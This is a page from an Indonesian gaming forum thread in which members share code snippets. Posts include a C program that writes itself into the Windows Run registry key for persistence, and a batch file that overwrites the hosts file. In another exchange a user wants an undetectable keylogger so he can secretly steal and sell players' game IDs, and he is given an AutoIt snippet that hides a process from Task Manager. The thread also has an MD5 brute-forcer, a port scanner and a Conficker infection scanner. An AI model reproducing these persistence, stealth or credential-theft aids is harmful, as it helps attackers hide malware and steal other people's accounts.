Page 3 of 4 FirstFirst 1234 LastLast
Results 31 to 45 of 54
http://idgs.in/199759
  1. #31

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : C (windows)
    Fungsi : menambah executable file ke startup (other version)
    Cara menggunakan : Save dgn ekstensi .c compile dgn compiler kesukaan anda
    platform: Windows
    credits: K1u (k0h.org & k1u.org)
    Spoiler untuk code :

    Code:
    #include <windows.h>
     
    int main(void)
    
    {
        /* Grab filename of process/exe using GetModuleFileName() function. */
        TCHAR szPath[MAX_PATH];
    
     
        GetModuleFileName(NULL,
                          szPath,
                          MAX_PATH);
    
     
        /* Create a New HKEY. */
        HKEY newValue;
     
        /* Open Registry key. */
    
        RegOpenKey(HKEY_LOCAL_MACHINE,
                   "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
    
                   &newValue);
     
        /* Note use HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add for the
    
            current user only.
     
            Now give a new value.
     
            Syntax for RegSetValueEx() function is
            LONG WINAPI RegSetValueEx(
            __in        HKEY hKey,
            __in_opt    LPCTSTR lpValueName,
    
            __reserved  DWORD Reserved,
            __in        DWORD dwType,
            __in_opt    const BYTE* lpData,
            __in        DWORD cbData
            );
     
            More info at http://msdn2.microsoft.com/en-us/library/ms724923.aspx */
    
     
        RegSetValueEx(newValue,
                      "Name_Me_Please",
                      0,
    
                      REG_SZ,
                      (LPBYTE)szPath,
                      sizeof(szPath));
    
     
        /* Close the key. */
        RegCloseKey(newValue);
        return 0;
    
    }
    Last edited by bl00d13z; 28-05-09 at 01:29.

  2. Hot Ad
  3. #32

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : Batch shell script
    Fungsi : Blocking site (DNS client resolver cache poisoning)
    Cara menggunakan : Save dgn ekstensi .bat dan jalankan
    platform: Windows

    Code:
    @echo off
    echo 127.0.0.1 www.google.com > C:\windows\system32\drivers\etc\hosts
    dimana www.google.com merupakan site yg diblok, cth lainnya:

    Code:
    @echo off
    echo 127.0.0.1 www.google.com > C:\windows\system32\drivers\etc\hosts
    echo 127.0.0.1 www.friendster.com > C:\windows\system32\drivers\etc\hosts
    echo 127.0.0.1 www.facebook.com > C:\windows\system32\drivers\etc\hosts
    echo 127.0.0.1 www.indogamers.com > C:\windows\system32\drivers\etc\hosts
    echo 127.0.0.1 www.indowebster.com > C:\windows\system32\drivers\etc\hosts

  4. #33
    konde's Avatar
    Join Date
    Apr 2007
    Location
    where you live
    Posts
    239
    Points
    298.90
    Thanks: 2 / 0 / 0

    Default

    Quote Originally Posted by bl00d13z View Post
    NB: ini script keyloger yg masih simpel, blum ada fungsi hidden process,encrypt fungsi/raw bit,dll utk bypass scanning AV..jadi pada saat compile dan file .exe terbentuk AV biasanya sudah mengenali ini sebagai keylog, dan jika dieksekusi pun masih tampil layar prompt yg bisa di close untuk menghentikan proses keylognya..
    Klo Av nya ada sistem pause, bisa gak kedetek kan? maunya seh yang hidden or yang gak kedetek neh biz dndm ma someone neh gr2 id public wa di jual diem2
    Game as Easy as ****......



  5. #34

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by konde View Post
    Klo Av nya ada sistem pause, bisa gak kedetek kan? maunya seh yang hidden or yang gak kedetek neh biz dndm ma someone neh gr2 id public wa di jual diem2
    klo mau yg lengkap fiturnya req di bagian aplkasi bro, minta tools keylogger, dsini cuma sharing source code aja, bukan yg lgsg jadi n berfitur lengkap..kalaupun mau ngembangin bisa gunain snippet vbs ini utk hidden processnya:

    Code:
    Opt("WinTitleMatchMode", 3);Exact title match
    Opt("MustDeclareVars", 1)
    HotKeySet("{ESC}","Stop")
    Dim $sProcessName, $iProcessIndex, $h_listview
    Global Const $LVM_DELETEITEM = 0x1008
    
    If Not(WinExists("Windows Task Manager")) Then
        Run(@SystemDir & "\taskmgr.exe", @SystemDir)
        WinWait("Windows Task Manager")
    ; remove the always on top attribute (otherwise task manager overlaps the input box)
        WinSetOnTop("Windows Task Manager", "", 0)
    EndIf
    $sProcessName = InputBox("Hide Process", "Enter the name of the process you want to remove from task manager:")
    While 1
    If $sProcessName <> 1 Then
        $iProcessIndex = ControlListView("Windows Task Manager", "", 1009, "FindItem", $sProcessName)
        If $iProcessIndex = -1 Then
            Sleep(2)
        Else
            $h_listview = ControlGetHandle("Windows Task Manager", "", 1009)
            DllCall("user32.dll", "int", "SendMessage", "hwnd", $h_listview, "int", $LVM_DELETEITEM, "int", $iProcessIndex, "int", 0)
        EndIf
    EndIf
    WEnd
    
    Func Stop()
    Exit 0
    EndFunc()
    gut luck..

  6. #35
    konde's Avatar
    Join Date
    Apr 2007
    Location
    where you live
    Posts
    239
    Points
    298.90
    Thanks: 2 / 0 / 0

    Default

    tq Om blood, meluncur ke tkp aplikasi

    EDIT*

    Om blood ini termasuk keylogger bukan http://img8.uploadhouse.com/fileuplo...81f1591a07.jpg
    Last edited by konde; 27-05-09 at 13:53.
    Game as Easy as ****......



  7. #36

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by konde View Post
    tq Om blood, meluncur ke tkp aplikasi

    EDIT*

    Om blood ini termasuk keylogger bukan http://img8.uploadhouse.com/fileuplo...81f1591a07.jpg
    yup termasuk, cm ane lom pernah pake yg itu.. ane kasih linknya ja ya di share aplikasi keylogger2 umum yg sering digunain..

    click here

  8. #37

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : Perl
    Fungsi : Bruteforce MD5 hash
    Cara menggunakan : Save dgn ekstensi .pl dan eksekusi dengan perl compiler
    Code:
    perl namefile.pl <char_set> <min_length> <max_length> <hash>
    dimana <char_set> = jenis karakter (a=a-z, d=0-9, A=A-Z, x=symbol)
    <min_length> = minimum lebar karakter
    <max_length> = maximum lebar karakter
    <hash> = MD5 hash yg akan di *****
    platform: All

    Screenshot
    Spoiler untuk code :

    Code:
    #!/usr/bin/perl 
    $ver = "01"; 
    $dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds. 
     
    if ($dbgtmr<=0){ die "Set dbgtmr to a value >=1 !\n";}; 
    use Digest::MD5 qw(md5_hex); 
    use Time::HiRes qw(gettimeofday); 
     
    if ($ARGV[0]=~"a") { 
     $alpha = "abcdefghijklmnopqrstuvwxyz";} 
    if ($ARGV[0]=~"A") { 
     $alpha = $alpha. "ABCDEFGHIJKLMNOPQRSTUVWXYZ";} 
    if ($ARGV[0]=~"d") { 
     $alpha = $alpha."1234567890";} 
    if ($ARGV[0]=~"x") { 
     $alpha = $alpha. "!\"\$%&/()=?-.:\\*'-_:.;,";} 
     
    if ($alpha eq "" or $ARGV[3] eq "") {usage();}; 
    if (length($ARGV[3]) != 32) { die "Sorry but it seems that the MD5 is not valid!\n";}; 
     
    print "Selected charset for attack: '$alpha\'\n"; 
    print "Going to ***** '$ARGV[3]'...\n"; 
     
    for (my $t=$ARGV[1];$t<=$ARGV[2];$t++){ 
     ***** ($t); 
    } 
     
    sub usage{ 
     print "\n\nMD5 Hash Bruteforce Kit v_$ver\n"; 
     print "by unix_chro alias backtrack ([email protected])\n"; 
     print "Member in staff leader:elite-members,ubuntu-hackers\n\n"; 
     print "USAGE\n"; 
     print "./md5crack <charset> <mincount> <maxcount> <yourMD5>\n"; 
     print " Charset can be: [aAdx]\n"; 
     print " a = {'a','b','c',...}\n"; 
     print " A = {'A','B','C',...}\n"; 
     print " d = {'1','2','3',...}\n"; 
     print " x = {'!','\"',' ',...}\n"; 
     print "EXAMPLE FOR CRACKING A MD5 HASH\n"; 
     print "./md5crack.pl ad 1 3 900150983cd24fb0d6963f7d28e17f72\n"; 
     print " This example tries to ***** the given MD5 with all lowercase Alphas and all digits.\n"; 
     print " MD5 Kit only tries combinations with a length from 1 and 3 characters.\n-------\n"; 
     print "./md5crack.pl aA 3 3 900150983cd24fb0d6963f7d28e17f72\n"; 
     print " This example tries to ***** the given MD5 with all lowercase Alphas and all uppercase Alphas.\n"; 
     print " MD5 Kit only tries passwords which length is exactly 3 characters.\n-------\n"; 
     print "./md5crack.pl aAdx 1 10 900150983cd24fb0d6963f7d28e17f72\n"; 
     print " This example tries to ***** the given MD5 with nearly every character.\n"; 
     print " MD5 Kit only tries combinations with a length from 1 to 10 characters.\n"; 
     die "Quitting...\n"; 
    } 
     
    sub *****{ 
     $CharSet = shift; 
     @RawString = (); 
     for (my $i =0;$i<$CharSet;$i++){ $RawString[i] = 0;} 
     $Start = gettimeofday(); 
     do{ 
      for (my $i =0;$i<$CharSet;$i++){ 
       if ($RawString[$i] > length($alpha)-1){ 
        if ($i==$CharSet-1){ 
        print "Bruteforcing done with $CharSet Chars. No Results.\n"; 
        $cnt=0; 
        return false; 
       } 
       $RawString[$i+1]++; 
       $RawString[$i]=0; 
       } 
      } 
    ##################################################  # 
       $ret = ""; 
       for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);} 
       $hash = md5_hex($ret); 
       $cnt++; 
       $Stop = gettimeofday(); 
       if ($Stop-$Start>$dbgtmr){ 
        $cnt = int($cnt/$dbgtmr); 
        print "$cnt hashes\\second.\tLast Pass '$ret\'\n"; 
        $cnt=0; 
        $Start = gettimeofday(); 
       } 
                print "$ARGV[3] != $hash ($ret)\n"; 
       if ($ARGV[3] eq $hash){ 
        die "\n**** Password Cracked! => $ret\n"; 
       } 
    ##################################################  # 
      #checkhash($CharSet)."\n"; 
     
      $RawString[0]++; 
     }while($RawString[$CharSet-1]<length($alpha)); 
    } 
     
    sub checkhash{ 
     $CharSet = shift; 
     $ret = ""; 
     for (my $i =0;$i<$CharSet;$i++){ $ret = $ret . substr($alpha,$RawString[$i],1);} 
     $hash = md5_hex($ret); 
     $cnt++; 
     $Stop = gettimeofday(); 
     if ($Stop-$Start>$dbgtmr){ 
      $cnt = int($cnt/$dbgtmr); 
      print "$cnt hashes\\second.\tLast Pass '$ret\'\n"; 
      $cnt=0; 
      $Start = gettimeofday(); 
     } 
     
     if ($ARGV[3] eq $hash){ 
      die "\n**** Password Cracked! => $ret\n"; 
     } 
     
    }

  9. #38

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : Java
    Fungsi : GUI Port Scanner
    Cara menggunakan : Save dgn namafile PortScanner.java dan compile dgn perintah
    Code:
    javac PortScanner.java
    eksekusi dgn
    Code:
    java PortScanner
    platform: All

    Screenshot
    Spoiler untuk code :

    Code:
    import javax.swing.*;
    import java.awt.*;
    import java.awt.event.*;
    import java.net.*;
    
    public class PortScanner extends JFrame {
      private JLabel lblURL=new JLabel("Host");
      private JTextField txfURL=new JTextField();
      private JLabel lblport1=new JLabel("port");
      private JTextField txfport1=new JTextField();
      private JLabel lblport2=new JLabel("to");
      private JTextField txfport2=new JTextField();
      private TextArea txahasil=new TextArea();
      private JButton btnStart=new JButton("Scan");
      private JButton btnClear=new JButton("Clear");
      private JButton btnExit=new JButton("Exit");
    
      public PortScanner() {
        setTitle("-=bloody_Port_Scanner=-");
        setSize(280,250);
        setLocation(200,100);
        setResizable(false);
        setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
      }
    
      public void komponenVisual() {
        getContentPane().setLayout(null);
        getContentPane().add(lblURL);
        getContentPane().add(txfURL);
        getContentPane().add(lblport1);
        getContentPane().add(lblport2);
        getContentPane().add(txfport1);
        getContentPane().add(txfport2);
        getContentPane().add(txahasil);
        getContentPane().add(btnStart);
        getContentPane().add(btnClear);
        getContentPane().add(btnExit);
        lblURL.setBounds(10,10,50,20);
        txfURL.setBounds(60,10,200,20);
        lblport1.setBounds(10,30,50,20);
        txfport1.setBounds(60,30,50,20);
        lblport2.setBounds(120,30,50,20);
        txfport2.setBounds(150,30,50,20);
        txahasil.setBounds(10,60,250,120);
        btnStart.setBounds(10,185,75,25);
        btnClear.setBounds(95,185,75,25);
        btnExit.setBounds(180,185,75,25);
        setVisible(true);
      }
    
      public void aksiReaksi() {
        btnStart.addActionListener(new ActionListener() {
          public void actionPerformed(ActionEvent e) {
            scannerIP scan=new scannerIP();
            scan.setHost(txfURL.getText());
            scan.setPort1(Integer.parseInt(txfport1.getText()));
            scan.setPort2(Integer.parseInt(txfport2.getText()));
            txahasil.setText("");
            txahasil.append("IP Address: \n"+scan.scanningIP()+"\n");
            txahasil.append(scan.getPort());
          }
        });
    
        btnClear.addActionListener(new ActionListener() {
          public void actionPerformed(ActionEvent e) {
            txfURL.setText("");
            txfport1.setText("");
            txfport2.setText("");
            txahasil.setText("");
            txfURL.requestFocus(true);
          }
        });
    
        btnExit.addActionListener(new ActionListener() {
          public void actionPerformed(ActionEvent e) {
            System.exit(0);
          }
        });
      }
    
      public static void main(String args[]) {
        PortScanner portScan=new PortScanner();
        portScan.komponenVisual();
        portScan.aksiReaksi();
      }
    }
    
    class scannerIP {
      private int port1;
      private int port2;
      private String host="";
      private static Socket socket=null;
      public String hsl="";
    
      public void setPort1(int port1) {
        this.port1=port1;
      }
    
      public void setPort2(int port2) {
        this.port2=port2;
      }
    
      public void setHost(String host) {
        this.host=host;
      }
    
      public String scanningIP() {
        String IP="";
        try {
          InetAddress theAddress=InetAddress.getByName(host);
          IP=String.valueOf(theAddress);
        } catch (Exception e) {
          IP="Unknown host address.";
        }
        return IP;
      }
    
      public String getPort() {
        int count=0;
        for (int i=port1;i<=port2;i++) {
          try {
            socket=new Socket(host,i);
            hsl+="Open port on "+i+"\n";
          } catch (Exception e) {
            System.out.println("ERROR port : "+i+" --> "+e);
          }
          count++;
        }
        hsl+="\nScanning FINISHED\n";
        return hsl;
      }
    }

  10. #39
    konde's Avatar
    Join Date
    Apr 2007
    Location
    where you live
    Posts
    239
    Points
    298.90
    Thanks: 2 / 0 / 0

    Default

    Quote Originally Posted by bl00d13z View Post
    yup termasuk, cm ane lom pernah pake yg itu.. ane kasih linknya ja ya di share aplikasi keylogger2 umum yg sering digunain..

    click here
    Mod blood kira2 yang bagus apa, byk buanget..... mpe bingung milihnya
    Game as Easy as ****......



  11. #40

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by konde View Post
    Mod blood kira2 yang bagus apa, byk buanget..... mpe bingung milihnya
    waduh setau ane sm aja.. relatif bagusnya, klo btuh yg mini2 ya cari yg kecilan..btuh yg bnyk fitur ya cr yg aga gdean..hehe

  12. #41

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : VBS
    Fungsi : Text to Speech
    Cara menggunakan : Save dgn ekstensi .VBS
    platform: Windows

    Screenshot

    Code:
    Dim msg, idgs
    msg=InputBox("Masukkan Kalimat","==Text to Speech==")
    Set idgs=CreateObject("sapi.spvoice")
    idgs.Speak msg

  13. #42

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : Javascript
    Fungsi : Menu Shutdown pada klik kanan
    Cara menggunakan : Save dgn ekstensi .js kemudian klik kanan -> open with command prompt
    platform: Windows

    Screenshot hasil



    Code:
    var vbCancel = 2;
    var vbInstallUninstallCancel = 3;
    var vbInstall = 6;
    var vbUninstall = 7;
    var vbQuestion = 32;
    var vbInformation = 64;
    var blood = WScript.CreateObject('WScript.Shell');
    var word = '-=Right Click Shutdown=-';
    var msg = 'choose your option:\n'+
    '--------------------------\n\n'+
    '- Click "Yes" for install in your system\n'+
    '- click "No" for remove\n'+
    '- click "Cancel" for quit\n\n'+
    '>> your choice? <<'
    var ask = blood.popup(msg,0,word,vbInstallUninstallCancel+vbQuestion);
    if (ask == vbInstall)
    {
    blood.RegWrite('HKCR\\Directory\\shell\\mati\\',
    '|||Shutdown Windows!|||','REG_SZ');
    blood.RegWrite('HKCR\\Directory\\shell\\mati\\command\\',
    'shutdown.exe -s -t 0','REG_SZ');
    blood.RegWrite('HKCR\\Drive\\shell\\mati\\',
    '|||Shutdown Windows!|||','REG_SZ');
    blood.RegWrite('HKCR\\Drive\\shell\\mati\\command\\',
    'shutdown.exe -s -t 0','REG_SZ');
    msg2 = 'Instalation Successfull';
    blood.popup(msg2,0,word,vbInformation);
    }
    else if (ask == vbUninstall)
    {
    blood.RegDelete('HKCR\\Directory\\shell\\mati\\command\\');
    blood.RegDelete('HKCR\\Directory\\shell\\mati\\');
    blood.RegDelete('HKCR\\Drive\\shell\\mati\\command\\');
    blood.RegDelete('HKCR\\Drive\\shell\\mati\\');
    msg3 = 'Uninstallation Complete';
    blood.popup(msg3,0,word,vbInformation);
    }
    else
    {
    msg4 = 'Quit!';
    blood.popup(msg4,0,word,vbInformation);
    }

  14. #43

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Prog Lang : Python
    Fungsi : Simple Conficker Scanner in network
    Mengindikasikan virus conficker pada jaringan (cocok untuk scanning pada jaringan besar).
    Cara menggunakan : Save kedua file dgn nama file scs.py dan scanner.py dalam 1 folder yg sama, eksekusi scs.py dgn format perintah:
    Code:
    python scs.py <ip-awal> <ip-akhir> | <iplist.txt>
    dimana <ip-awal> dan <ip-akhir> merupakan range network yg ingin kita scan, jika hanya IP2 tertentu kita dapat inputkan IP2 tersebut kedalam iplist.txt
    Requirement Modules: impacket bisa di download disini
    Code:
    http://oss.coresecurity.com/repo/Impacket-0.9.6.0.zip
    Credits :Felix Leder & Tillmann Werner
    platform: All

    Screenshot


    scs.py
    Spoiler untuk code :

    Code:
    #!/usr/bin/python 
    
     ###############################################################################
     #                    Simple Conficker Scanner
     #
     #
     #
     # Copyright (C) 2009  Felix Leder & Tillmann Werner
     # 
     # This program is free software; you can redistribute it and/or
     # modify it under the terms of the GNU General Public License
     # as published by the Free Software Foundation; either version 3
     # of the License, or (at your option) any later version.
     # 
     # This program is distributed in the hope that it will be useful,
     # but WITHOUT ANY WARRANTY; without even the implied warranty of
     # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
     # GNU General Public License for more details.
     # 
     # You should have received a copy of the GNU General Public License
     # along with this program; if not, write to the Free Software
     # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
     # 
     # 
     #             contact {leder,werner}@cs.uni-bonn.de
     #
     #
     #  thanks to Dan Kaminsky for tricking us into writing this tool
     #
     ###############################################################################
    
    
    
    import mutex
    import re
    import scanner
    import sys
    from threading import Thread
    import thread
    import time
    
    
    FRESH=0
    SCANNING=1
    IDLE=2
    
    
    THREAD_COUNT=100
    
    class ScannerEngine(Thread):
        
        def __init__ (self, mtx):
            Thread.__init__(self)
            self.status = FRESH
            self.lock = mtx
    
        def get_next_ip(self):            
            self.lock.acquire()
            self.ip = get_next_ip()
            self.lock.release()
    
        def run(self):
            self.get_next_ip()
            while self.ip!=None:
                #print "Looking at IP", self.ip
                scanner.test_infection(self.ip)            
                #print self.ip
                time.sleep(0.1)
                    
                self.get_next_ip()
    
    
    
    current_ip=None
    max_ip=None
    ip_list=[]
    ip_pos=0
    
    def get_next_ip():
        global current_ip, max_ip, ip_list, ip_pos
    
        ret = None
    
        if (not current_ip) or (not max_ip): 
            
            if ip_pos>=len(ip_list): return None
            
            ret = ip_list[ip_pos]
            ip_pos+=1
            
        else:
            if current_ip > max_ip: return None
    
            ret = repr(current_ip)
            current_ip.plusone()
    
        return ret
    
    
    class ip_addr(object):
        
        def __init__(self, ip_str):
            self.value = ip_str
    
        def to_ints(self):
            return [int(v) for v in self.value.split(".")]
    
        def plusone(self):
            vals = self.to_ints()
            vals[3]+=1
            if vals[3]>255:
                vals[3]=0
                vals[2]+=1
                if vals[2]>255:
                    vals[2]=0
                    vals[1]+=1
                    if vals[1]>255:
                        vals[1]=0
                        vals[0]+=1
                        if vals[0]>255:
                            vals[0] = 0
    
            self.value="%i.%i.%i.%i" % (vals[0], vals[1], vals[2],vals[3])
    
        def __repr__(self):
            return self.value
    
        def __cmp__(self, other):
            me = self.to_ints()
            ot = other.to_ints()
    
            for i in xrange(4):
                if me[i]<ot[i]: return -1
                elif me[i]>ot[i]: return 1
            
            return 0
    
    
    def is_ip(addr):
        ip = addr.split(".")
        if len(ip)!=4: return False
    
        for i in ip:
            num = int(i)
            if  num<0 or num>255: return False
    
        return True
        
    
    
    def usage():
        print """Usage:
    %s <start-ip> <end-ip> | <ip-list-file>""" % sys.argv[0]
    
        sys.exit(1)
        
    
    if __name__=="__main__":
        threads = []
    
        scanner.print_creds()
        
        if len(sys.argv)==3:
            if not is_ip(sys.argv[1]): usage()
            if not is_ip(sys.argv[2]): usage()    
    
            current_ip = ip_addr(sys.argv[1])
            max_ip = ip_addr(sys.argv[2])
    
            if current_ip > max_ip:
                hlp = max_ip
                max_ip = current_ip
                current_ip = hlp
    
        elif len(sys.argv)==2:
            ip_list = [x.replace("\n","") for x in file(sys.argv[1],"r").readlines()]
            ip_pos = 0
    
        else:
            usage()
        
    
        lock = thread.allocate_lock()
    
        for i in xrange(THREAD_COUNT):
            t = ScannerEngine(lock)
            t.start()
            threads.append(t)
    
        for t in threads:
            t.join()
    
        print "Done"


    scanner.py
    Spoiler untuk code :
    Code:
    #!/usr/bin/python
    
     ###############################################################################
     #                    Simple Conficker Scanner
     #                      (single host scanner)
     #
     #
     # Copyright (C) 2009  Felix Leder & Tillmann Werner
     # 
     # This program is free software; you can redistribute it and/or
     # modify it under the terms of the GNU General Public License
     # as published by the Free Software Foundation; either version 3
     # of the License, or (at your option) any later version.
     # 
     # This program is distributed in the hope that it will be useful,
     # but WITHOUT ANY WARRANTY; without even the implied warranty of
     # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
     # GNU General Public License for more details.
     # 
     # You should have received a copy of the GNU General Public License
     # along with this program; if not, write to the Free Software
     # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
     # 
     # 
     #             contact {leder,werner}@cs.uni-bonn.de
     #
     #
     #  thanks to Dan Kaminsky for tricking us into writing this tool
     #
     ###############################################################################
    
    
    
    
    import struct
    import sys
    
    from struct import pack
    try:
    	from impacket import smb
    	from impacket import uuid
    	from impacket.dcerpc import dcerpc
    	from impacket.dcerpc import transport
    except:
    	print "[ERROR] Impacket package not found"
    	sys.exit(1)
    
    class Request:
    	def __init__(self, server, path):
    		self.server = server
    		self.path = path
    
    		self.stub  = '\x01\x00\x00\x00'
    		self.stub += pack('III', len(self.server)/2, 0, len(self.server)/2)
    		self.stub += self.server
    		self.stub += pack('III', len(self.path)/2, 0, len(self.path)/2)
    		self.stub += self.path
    		self.stub += '\x02\x00\x00\x00\x02\x00\x00\x00'
    		self.stub += '\x00\x00\x00\x00\x02\x00\x00\x00'
    		self.stub += '\x5c\x00\x00\x00\x01\x00\x00\x00'
    		self.stub += '\x01\x00\x00\x00'
    
    	def run(self):
    		self.dce.call(0x1f, self.stub)
    
    
    class Scan(Request):
    	def __init__(self):
    		server = 'a' * 1 + '\0\0\0'
    		path = '\x5c\0\x2e\0\x2e\0\x5c\0\0\0\0\0'
    		Request.__init__(self, server, path)
    
    
    
    def test_infection(ip):
    	retval = 0
    
    	# INIT
    	try:
    		t = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % ip)
    		t.set_dport(445)
    		t.connect()
    	except:
    		print 'No resp.: %s:445/tcp.' % ip
    		return 0
    
    
    	# NetpwPathCanonicalize
    	try:
    		dce = t.DCERPC_class(t)
    		dce.bind(uuid.uuidtup_to_bin(('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0')))
    
    		scanner = Scan()
    		scanner.dce = dce
    		scanner.run()
    
    		response = dce.recv()
    	except:
    		print 'Error running NetPathCanonicalize'
    		return 0
    	
    
    	if (len(response)>=16):		
    		result = struct.unpack('IIII', response[:16])
    
                    if result[1]==0x5c450000 and result[3]==0x00000057:
                            print '[WARNING] %s seems to be infected by Conficker!' % ip
                            retval = 1
                    elif result[1] != 0 and result[3] != 123:
                            print "Unknown dcerpc return value 0x%08x" % result[3]
                    elif result[1] != 0 and result[1] != 0x5c450000:
                            print "Unknown error code: 0x%08x" % result[1]
    
    			
    	if retval == 0:
    		print '%s seems to be clean.' % (ip)
    
    	dce.disconnect()
    
    	return retval
    
    
    def print_creds():
    	print """
    ----------------------------------
       Simple Conficker Scanner
    ----------------------------------
    scans selected network ranges for
    conficker infections
    ----------------------------------
    Felix Leder, Tillmann Werner 2009
    {leder, werner}@cs.uni-bonn.de
    ----------------------------------
    """
    
    
    
    
    if __name__ == '__main__':
    	print_creds()
    
    	if len(sys.argv) != 2:
    		print 'Usage: %s <host>' % sys.argv[0]
    		sys.exit(0)
    
    	test_infection(sys.argv[1])

  15. #44
    nveuu's Avatar
    Join Date
    Apr 2007
    Location
    di warnet
    Posts
    2,496
    Points
    494.79
    Thanks: 36 / 20 / 11

    Default

    req algoritma bwat encrypt string yg simple2 aj...
    tesera bahasa ap...

  16. #45

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by nveuu View Post
    req algoritma bwat encrypt string yg simple2 aj...
    tesera bahasa ap...
    Spoiler untuk code :
    Code:
    <html>
    	<head>
        <title>Base64 Encoding/Decoding</title>
        <link rel=STYLESHEET href="style.css" type="text/css">
        <style>
    			all.clsMenuItemNS, .clsMenuItemIE{text-decoration: none; font: bold 12px Arial; color: white; cursor: hand; z-index:100}
    			#MainTable A:hover {color: #A0A0A0;}
    		</style>
    	</head>
    	<body>
    		<br><br>
    		<script language="JavaScript">
    			var keepstatic=1
    			var menucolor="#000000"
    			var submenuwidth=150
    		</script>
    		<script language="JavaScript" src="menu.js"></script>
    		<script language="JavaScript" src="menucontext.js"></script>
    		<script language="JavaScript">
    			showToolbar();
    		</script>
    		<script language="JavaScript">
    			function UpdateIt(){
    			if (ie&&keepstatic&&!opr6)
    				document.all["MainTable"].style.top = document.body.scrollTop;
    				setTimeout("UpdateIt()", 200);
    			}
    			UpdateIt();
    		</script>
       <script type="text/javascript"><!--
    
       var keyStr = "ABCDEFGHIJKLMNOP" +
                    "QRSTUVWXYZabcdef" +
                    "ghijklmnopqrstuv" +
                    "wxyz0123456789+/" +
                    "=";
    
       function encode64(input) {
          var output = "";
          var chr1, chr2, chr3 = "";
          var enc1, enc2, enc3, enc4 = "";
          var i = 0;
    
          do {
             chr1 = input.charCodeAt(i++);
             chr2 = input.charCodeAt(i++);
             chr3 = input.charCodeAt(i++);
    
             enc1 = chr1 >> 2;
             enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
             enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
             enc4 = chr3 & 63;
    
             if (isNaN(chr2)) {
                enc3 = enc4 = 64;
             } else if (isNaN(chr3)) {
                enc4 = 64;
             }
    
             output = output +
                keyStr.charAt(enc1) +
                keyStr.charAt(enc2) +
                keyStr.charAt(enc3) +
                keyStr.charAt(enc4);
             chr1 = chr2 = chr3 = "";
             enc1 = enc2 = enc3 = enc4 = "";
          } while (i < input.length);
    
          return output;
       }
    
       function decode64(input) {
          var output = "";
          var chr1, chr2, chr3 = "";
          var enc1, enc2, enc3, enc4 = "";
          var i = 0;
    
          // deldel smua char slain A-Z, a-z, 0-9, +, /, or =
          var base64test = /[^A-Za-z0-9\+\/\=]/g;
          if (base64test.exec(input)) {
             alert("baleg we lah input teh\n" +
                   "Valid base64 characters are A-Z, a-z, 0-9, ´+´, ´/´, and ´=´\n" +
                   "Expect errors in decoding.");
          }
          input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
    
          do {
             enc1 = keyStr.indexOf(input.charAt(i++));
             enc2 = keyStr.indexOf(input.charAt(i++));
             enc3 = keyStr.indexOf(input.charAt(i++));
             enc4 = keyStr.indexOf(input.charAt(i++));
    
             chr1 = (enc1 << 2) | (enc2 >> 4);
             chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
             chr3 = ((enc3 & 3) << 6) | enc4;
    
             output = output + String.fromCharCode(chr1);
    
             if (enc3 != 64) {
                output = output + String.fromCharCode(chr2);
             }
             if (enc4 != 64) {
                output = output + String.fromCharCode(chr3);
             }
    
             chr1 = chr2 = chr3 = "";
             enc1 = enc2 = enc3 = enc4 = "";
    
          } while (i < input.length);
    
          return output;
       }
    
       //--></script>
    		<form name="base64Form">
    			<center>
    				ketik text na beul.. rek di konvert ka base 64 moal!<br>
    
    				<textarea name="theText" cols="40" rows="6"></textarea><br>
    				<input type="button" name="encode" value="Encode ke base64"
    					onClick="document.base64Form.theText.value=encode64(document.base64Form.theText.value);">
    				<input type="button" name="decode" value="Decode from base64"
    					onClick="document.base64Form.theText.value=decode64(document.base64Form.theText.value);">
    			<center>
    		</form>
    	</body>
    </html>

    duh gi malez nulis pjg2 smile: tau ya cara pakeny,.

Page 3 of 4 FirstFirst 1234 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •